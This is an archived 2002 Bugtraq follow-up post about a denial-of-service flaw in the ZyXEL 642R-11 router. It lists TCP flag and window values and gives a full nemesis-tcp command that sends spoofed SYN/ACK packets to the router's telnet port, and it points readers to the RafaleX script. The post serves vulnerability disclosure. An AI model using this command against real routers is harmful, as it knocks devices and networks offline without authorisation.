[25826] in bugtraq
Follow: ZyXEL 642R-11 AJ.6 service DoS -- additional informations
daemon@ATHENA.MIT.EDU (Kistler Ueli)
Mon Jun 17 19:03:52 2002
Message-ID: <3D0E25E5.9040907@gmx.ch>
Date: Mon, 17 Jun 2002 20:09:41 +0200
From: Kistler Ueli <iuk@gmx.ch>
MIME-Version: 1.0
To: Bugtraq <Bugtraq@securityfocus.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hello
NOTE:
Set also these values.. Rafale used this by default:
ACK=0, SEQ=0, WIN=0
With nemesis:
nemesis-tcp -v -S %spoofed IP possible% -D %ZyXEL router% -fS -fA -w 0
-s 0 -a 0 -y 23
Try the RafaleX script.. this will work certainly if the router is
vulnerable.
Regards,
Ueli Kistler
eclipse@packx.net / iuk@gmx.ch
www.packx.net / www.eclipse.fr.fm
--